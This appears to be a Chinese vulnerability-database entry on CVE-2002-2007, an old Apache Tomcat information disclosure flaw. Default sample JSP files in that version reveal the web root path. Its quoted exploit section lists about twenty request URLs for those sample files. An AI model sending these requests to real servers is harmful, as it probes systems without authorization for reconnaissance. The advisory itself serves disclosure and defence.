Apache Tomcat Source.JSP畸形请求导致信息泄露漏洞

Apache Tomcat Source.JSP畸形请求导致信息泄露漏洞

漏洞ID 1106754 漏洞类型 设计错误
发布时间 2002-05-29 更新时间 2005-10-20
图片[1]-Apache Tomcat Source.JSP畸形请求导致信息泄露漏洞-安全小百科CVE编号 CVE-2002-2007
图片[2]-Apache Tomcat Source.JSP畸形请求导致信息泄露漏洞-安全小百科CNNVD-ID CNNVD-200212-132
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21491
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-132
|漏洞详情
ApacheTomcat是一款由ApacheFoundation维护的免费开放源代码的Web服务器程序。ApacheTomcat中的realPath.jsp对用户提交的请求处理存在漏洞,可导致远程攻击者获得系统路径相关的信息。ApacheTomcat安装后会提供在Web目录下建立test目录,并提供几个样例脚本,其中包括Source.JSP,攻击者可以直接请求Source.JSP,导致脚本返回Web目录安装路径信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/4877/info

Apache Tomcat is a freely available, open source web server maintained by
the Apache Foundation.

When Apache Tomcat is installed with a default configuration, several example files are also installed. When some of these example files are requested without any input, they will return an error containing the absolute path to the server's web root. 

The attacker can submit a request in one of the following formats:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp
|参考资料

来源:US-CERTVulnerabilityNote:VU#116963
名称:VU#116963
链接:http://www.kb.cert.org/vuls/id/116963
来源:BID
名称:4878
链接:http://www.securityfocus.com/bid/4878
来源:BID
名称:4877
链接:http://www.securityfocus.com/bid/4877
来源:BID
名称:4876
链接:http://www.securityfocus.com/bid/4876
来源:www.procheckup.com
链接:http://www.procheckup.com/security_info/vuln_pr0207.html
来源:www.procheckup.com
链接:http://www.procheckup.com/security_info/vuln_pr0206.html
来源:www.procheckup.com
链接:http://www.procheckup.com/security_info/vuln_pr0205.html
来源:XF
名称:tomcat-sample-reveal-path(9208)
链接:http://www.iss.net/security_center/static/9208.php
来源:BUGTRAQ
名称:20020529VulnerabilityinApacheTomcatv3.23&v3.24;(part2)
链接:http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00275.html
来源:BUGTRAQ
名称:20020529VulnerabilityinApacheTomcatv3.23&v3.24;
链接:http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00272.html
来源:NSFOCUS
名称:2908※2910
链接:http://www.nsfocus.net/vulndb/2908※2910

相关推荐: PHPRank Banner Script Code Injection Vulnerability

PHPRank Banner Script Code Injection Vulnerability 漏洞ID 1101414 漏洞类型 Input Validation Error 发布时间 2002-10-10 更新时间 2002-10-10 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享